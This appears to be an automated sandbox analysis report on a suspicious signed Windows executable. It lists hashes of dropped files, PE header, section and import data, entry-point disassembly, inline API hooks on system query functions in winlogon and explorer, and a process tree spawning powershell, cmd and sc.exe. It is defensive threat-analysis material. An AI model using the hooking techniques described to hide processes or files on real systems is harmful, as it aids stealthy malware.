SHA1: | 1AC0BAF5FFAB65D715ED5E6D21679B91E3E674F4 |
SHA-256: | 3F7204CAD2D578B05FBD73A1B976D6AC979145FCACD83908700D361CF12BC939 |
SHA-512: | 1717547DC8C8177C96A8E2C44FB139F938A49A44D8A5C68E940859A8ED0E355055C3DBF7D35F948557D61520F3A908AF4FEC6E93F62A94E4D260EE53163530CB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 3.8087925092526325 |
Encrypted: | false |
SSDEEP: | 384:Fh9h1hvh+h/h8hBhHFhKJhFhxhShxdh6h0hhhThah+hXhFhjh8hdhehrchHhGhvF:F/eCu7jg |
MD5: | AA17B591FB49AAE70E2FDA0A4E29A233 |
SHA1: | BEC6E44E22A3BA270A9CFB62C7E6EA7D17CB3C4C |
SHA-256: | A2BCE7FFA058FC98D852E68182755E8F53B17AA13C832B06FD4687AF6025BB63 |
SHA-512: | BDA1B574C861BD7BC6CD6ED9DFA22165D090A08CAAA22D406D5365DE80207770B4C64B700156D4765DB3205E5BD9F05E7129B206AA04E608E3CD469E44F846AE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 3.8807169826709864 |
Encrypted: | false |
SSDEEP: | 384:1hsV80VUVAOV+8VPVRV8VuV4VCVlViVLVbVhV9V8VcVMVXUg7/TP5uc8WfJ5S0Gd:1/Mfg7/TP5ucrk0G9G9SAMLgM |
MD5: | 064E49AC92987291E981ADB98DCBA198 |
SHA1: | F61B1497809498EC96D19F83B286177E51A67885 |
SHA-256: | D347274F9AEB33C419AF04A170FE151DDEA3245DA52C4B838A1B5531FFB1EBC2 |
SHA-512: | E50E19A729CD6DAB2306FE36455675938098A3459C9006127CD9A7D29D548109083176B3E1694A6E855260AE7C89F0FF9EF60F44BBC420256F07903FF96AD44F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 3.6633174586145385 |
Encrypted: | false |
SSDEEP: | 768:c2iNZ5Pu7HjHgU/PA4nzPv48vrAQ3noAYoFJrDf04rfIcbj04rfPHU0jLg40gvPP:R |
MD5: | F39C76A8FC3F0F9C8113E55EFDE95043 |
SHA1: | 4B0B10FAE8F4177EFD271851FCCA4DEB04D7206D |
SHA-256: | 92FF8AEA6304F3C76EBE3FE6ACC11AAA4BA785CDA108BF0DE77F5681E4BAB5EC |
SHA-512: | CC9E8A6D9D3A49DFC0700289CD730998E8A7FC85FD173E95DEC63D1706EC9E1C0CB263A98479249AE1BC1791740241550E5901A5C458FED5C011C8F5D21DBCC3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98688 |
Entropy (8bit): | 3.0674599562280402 |
Encrypted: | false |
SSDEEP: | 768:AK2aSb+oY4pY+GhjYsx+Oa9rs4b6l3Ju6FWORIk5QHCMjAy/RBKkdD98XIA7K2aN:Xw |
MD5: | 6094AA9502825079EBF495AD9C3ACA97 |
SHA1: | 7D11E3D59833170BF2480892F8906F8F039EA944 |
SHA-256: | 4A38FBE94A3819BED941E6D51FDF6A5A26AE4D9039CC0D4FA850E674746D94A2 |
SHA-512: | AB1D6FBAA45183A07DD7363A2640519E028F40333EB9B1EA1B5E044ADBFF71DFD678899022E73E0BAF4C8650998D5DFD06B16904710B0909D3D68E5A66B9E5AF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.242930031881895 |
Encrypted: | false |
SSDEEP: | 384:ph/BwBeabuSBwBTBwBlBwB1BwBPBwBXBwB+BwB6BwBWBwBUBwBSBwBUBwBeBwBFX:p7abRi+DFLVLZVN |
MD5: | 38C0FBCA2A34F3DD78D292B4A6E10C87 |
SHA1: | 00626EF5F25CDEDC9AC2210234E62ADDA943517E |
SHA-256: | F4A786DFDFDF53A60C89D3D9690C20F878B6383A61C7300815FC6FE7F850C0CD |
SHA-512: | 1FFBD35D282021B43BE7C44162AC91CE396384D3EBA8D63B85FAF138BC6CC91BDDBBF23A48A11BA5B382176BC7A3DDFE5DE8121ACC7BC996EC69BCBCCE49E5D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.5509093890179249 |
Encrypted: | false |
SSDEEP: | 384:ihErUEyUEYUE9UEOUE5UEdTUEgUEdHUEtUEzUEUUElZUEkUEsUE8UElUEeUEoUE9:ie4Y3 |
MD5: | 99897A421122019E38AFD3B6235F8A03 |
SHA1: | 4FB8942FF9460B9EF08F46CCD18BFE8DA3069263 |
SHA-256: | 7776E5B09F9125AFA0EFA6ED75A9707AC43B179A679F44E0F5A87FB4CBFA977F |
SHA-512: | 75A28ECFB67075F956C129D4DAC38BB0F8730B5BCDCD292B655803553DEA26E444A1192F652C653E9239D39DBFA46817F4476E5167DB2E5DF29076A1A3B20E90 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.176100082151436 |
Encrypted: | false |
SSDEEP: | 384:NFRvLoyoAjoKuoPfFDG0ocMtnnEHKQYLoLo1ZoUwo8MtXAo8Mt7oIuEgo8Mtqfom:PBBl |
MD5: | 0DA901C6028EC1132501EAD2AD5A86B4 |
SHA1: | 663B2CBA78442914FE420D58F7F229BBE6ED1AE0 |
SHA-256: | 177E53BDBC05974D8755EF31E3F76F418C7C25FDCE7B44B8C54198411E9D7B9B |
SHA-512: | 62C4DB34D1D6C4019CB36A34DA44BED84FDABBA816B1EE2B3C286738558403DD7EB68B65F0540F36FCB67B0EFA0A0016FB8160542DAB9E881CC9D7F8C828FCE6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2480 |
Entropy (8bit): | 3.935016658895314 |
Encrypted: | false |
SSDEEP: | 48:M+2Lk/6jTUGSTUMUBaQKp5AlhPZlf0xKi+yFB58y78gCKuKh:KOmTU5TUMUBo6Vf0xXB58y7bCtW |
MD5: | B6570B055FC21150FD2DE1312C34E5AA |
SHA1: | 9701E12B4F0EE8CA23D314C9FAC0307F66CAA9B9 |
SHA-256: | E065D511AC3921E5F0A6F6D436BE3131B7E024BB3C41C693655DD10C237BE870 |
SHA-512: | 39014DE3E960E0D9ED0BFC1D15DFA892D315886268ACA328CDDCDA8E91AED6F9E21D0456A142CF518ABBE3EA3C8AD4D35349B684709F3865AD88754BC08652D4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 27536 |
Entropy (8bit): | 3.8130179832121898 |
Encrypted: | false |
SSDEEP: | 384:B9v49vS9vk9v7i9vR9ve9vJl9vJeqOdqOjqOJqOxBqOmqOOqOXqOc:L42cKjaRHRehPVbCKD4 |
MD5: | 620193084B1A93183D75EF6E59204B8F |
SHA1: | 2FF0AB400831E6DF7DE1B29C52EED795F94B526D |
SHA-256: | 0CC5F4A2C676292D4E6C015E0DB5FB02DE625ED60C1C613C8C1F30D1B1CD8826 |
SHA-512: | A0C6F454141A897181A13DF1EF784BE5FADA264BF03498F019FAA12E512C2F764E749F8816D025C1F676192F850D2AE2AB2F71568DE2D0B0A5BF4151590A7D07 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\wbem\WMIADAP.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3444 |
Entropy (8bit): | 5.011954215267298 |
Encrypted: | false |
SSDEEP: | 48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW |
MD5: | B133A676D139032A27DE3D9619E70091 |
SHA1: | 1248AA89938A13640252A79113930EDE2F26F1FA |
SHA-256: | AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15 |
SHA-512: | C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.644002604978999 |
TrID: |
|
File name: | file.exe |
File size: | 10264640 |
MD5: | eee7b971e0b76a0df56bdac2ac2fa343 |
SHA1: | c80f9d9de5d0dff115bbb7638554dade321d7c65 |
SHA256: | ecd60313ba990f1300b37db4064977e83f109fdf93a728cf434106c1b5b5a2d5 |
SHA512: | fffd216c820b3be324ac72a46c50683b42218deaf95c219670c3f44c091424e8ed5fc42b28f4aab46e8024a52cbe4ca989031ca3641536f3fae0a2b5f4f79e85 |
SSDEEP: | 98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+ |
TLSH: | 29A6D06D86866FE6EB880AF3491D47B6DEE21DF425E7E13180F8DF3325FA8800395195 |
File Content Preview: | MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......d...............&.....\...*.............@....................................$.....`... ............................ |
Icon Hash: | 3271ccd4b2e07106 |
Entrypoint: | 0x1400014b0 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x140000000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT |
Time Stamp: | 0x6482B51E [Fri Jun 9 05:14:06 2023 UTC] |
TLS Callbacks: | 0x40010560, 0x1, 0x40010530, 0x1 |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f7505c167603909b7180406402fef19e |
Signature Valid: | false |
Signature Issuer: | CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 2C3567A8535342474E8B4C4BC12317CB |
Thumbprint SHA-1: | 6F474206BCBB391BB82BA9E5DC0302DEF37AEBBE |
Thumbprint SHA-256: | B6D977A471725F37DE725D31A36D4BE7CA6D0DABEB7F1F1F597E43045B83ABBE |
Serial: | 05308B76AC2E15B29720FB4395F65F38 |
Instruction |
---|
dec eax |
sub esp, 28h |
dec eax |
mov eax, dword ptr [009C1545h] |
mov dword ptr [eax], 00000001h |
call 00007FA828A254CFh |
nop |
nop |
dec eax |
add esp, 28h |
ret |
nop dword ptr [eax] |
dec eax |
sub esp, 28h |
dec eax |
mov eax, dword ptr [009C1525h] |
mov dword ptr [eax], 00000000h |
call 00007FA828A254AFh |
nop |
nop |
dec eax |
add esp, 28h |
ret |
nop dword ptr [eax] |
dec eax |
sub esp, 28h |
call 00007FA828A3DAE4h |
dec eax |
test eax, eax |
sete al |
movzx eax, al |
neg eax |
dec eax |
add esp, 28h |
ret |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
dec eax |
lea ecx, dword ptr [00000009h] |
jmp 00007FA828A257E9h |
nop dword ptr [eax+00h] |
ret |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
dec eax |
lea eax, dword ptr [009C74A9h] |
dec eax |
lea edx, dword ptr [eax+21h] |
mov byte ptr [eax], 00000000h |
dec eax |
add eax, 01h |
dec eax |
cmp eax, edx |
jne 00007FA828A25806h |
ret |
dec eax |
lea eax, dword ptr [009C7451h] |
dec eax |
lea edx, dword ptr [eax+18h] |
mov word ptr [eax], 0000h |
dec eax |
add eax, 02h |
dec eax |
cmp eax, edx |
jne 00007FA828A25804h |
ret |
dec eax |
lea eax, dword ptr [009C7417h] |
dec eax |
lea edx, dword ptr [eax+14h] |
mov word ptr [eax], 0000h |
dec eax |
add eax, 02h |
dec eax |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9ca000 | 0xa34 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9cd000 | 0xa80 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x9c4000 | 0x1230 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9c6000 | 0x4040 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9ce000 | 0x330 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x9c2000 | 0x28 | .rdata |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9ca28c | 0x250 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x1aa20 | 0x1ac00 | False | 0.4646429614485981 | data | 6.160137509897198 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.data | 0x1c000 | 0x9a26e0 | 0x9a2800 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rdata | 0x9bf000 | 0x4270 | 0x4400 | False | 0.38338694852941174 | data | 4.987899244906076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.pdata | 0x9c4000 | 0x1230 | 0x1400 | False | 0.4341796875 | data | 4.865236906764568 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.xdata | 0x9c6000 | 0xf44 | 0x1000 | False | 0.241455078125 | data | 4.036582842306508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.bss | 0x9c7000 | 0x28e0 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.idata | 0x9ca000 | 0xa34 | 0xc00 | False | 0.3046875 | data | 3.8892775409781057 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.CRT | 0x9cb000 | 0x60 | 0x200 | False | 0.06640625 | data | 0.3085875245953951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.tls | 0x9cc000 | 0x10 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x9cd000 | 0xa80 | 0xc00 | False | 0.3518880208333333 | data | 4.0923733872388315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.reloc | 0x9ce000 | 0x330 | 0x400 | False | 0.5712890625 | data | 4.774016362476347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_ICON | 0x9cd130 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States |
RT_GROUP_ICON | 0x9cd418 | 0x14 | data | English | United States |
RT_VERSION | 0x9cd430 | 0x324 | data | English | United States |
RT_MANIFEST | 0x9cd758 | 0x325 | XML 1.0 document, ASCII text | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte |
msvcrt.dll | __C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Code Manipulations
Function Name | Hook Type | Active in Processes |
---|---|---|
ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe |
NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe |
ZwResumeThread | INLINE | winlogon.exe, explorer.exe |
NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe |
ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe |
NtEnumerateKey | INLINE | winlogon.exe, explorer.exe |
NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe |
ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe |
ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe |
NtResumeThread | INLINE | winlogon.exe, explorer.exe |
RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe |
NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe |
NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe |
ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe |
ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe |
Function Name | Hook Type | New Data |
---|---|---|
ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
Function Name | Hook Type | New Data |
---|---|---|
ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
Click to jump to process
Target ID: | 0 |
Start time: | 13:29:07 |
Start date: | 09/06/2023 |
Path: | C:\Users\user\Desktop\file.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66b520000 |
File size: | 10264640 bytes |
MD5 hash: | EEE7B971E0B76A0DF56BDAC2AC2FA343 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Target ID: | 1 |
Start time: | 13:29:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7466a0000 |
File size: | 447488 bytes |
MD5 hash: | 95000560239032BC68B4C2FDFCDEF913 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
Target ID: | 2 |
Start time: | 13:29:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 4 |
Start time: | 13:29:22 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7cb270000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 5 |
Start time: | 13:29:22 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 6 |
Start time: | 13:29:22 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 7 |
Start time: | 13:29:23 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 8 |
Start time: | 13:29:23 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 9 |
Start time: | 13:29:23 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 10 |
Start time: | 13:29:24 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 11 |
Start time: | 13:29:25 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\dialer.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60f5c0000 |
File size: | 36864 bytes |
MD5 hash: | 0EC74656A7F7667DD94C76081B111827 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 12 |
Start time: | 13:29:25 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7466a0000 |
File size: | 447488 bytes |
MD5 hash: | 95000560239032BC68B4C2FDFCDEF913 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Target ID: | 13 |
Start time: | 13:29:25 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 14 |
Start time: | 13:29:26 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\winlogon.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b23f0000 |
File size: | 677376 bytes |
MD5 hash: | F9017F2DC455AD373DF036F5817A8870 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 15 |
Start time: | 13:29:26 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\lsass.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c5470000 |
File size: | 57976 bytes |
MD5 hash: | 317340CD278A374BCEF6A30194557227 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 16 |
Start time: | 13:29:28 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 17 |
Start time: | 13:29:28 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 18 |
Start time: | 13:29:28 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\dwm.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66aed0000 |
File size: | 62464 bytes |
MD5 hash: | 70073A05B2B43FFB7A625708BB29E7C7 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 19 |
Start time: | 13:29:39 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\wbem\WMIADAP.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff639610000 |
File size: | 177664 bytes |
MD5 hash: | 9783D0765F31980950445DFD40DB15DA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 20 |
Start time: | 13:29:46 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
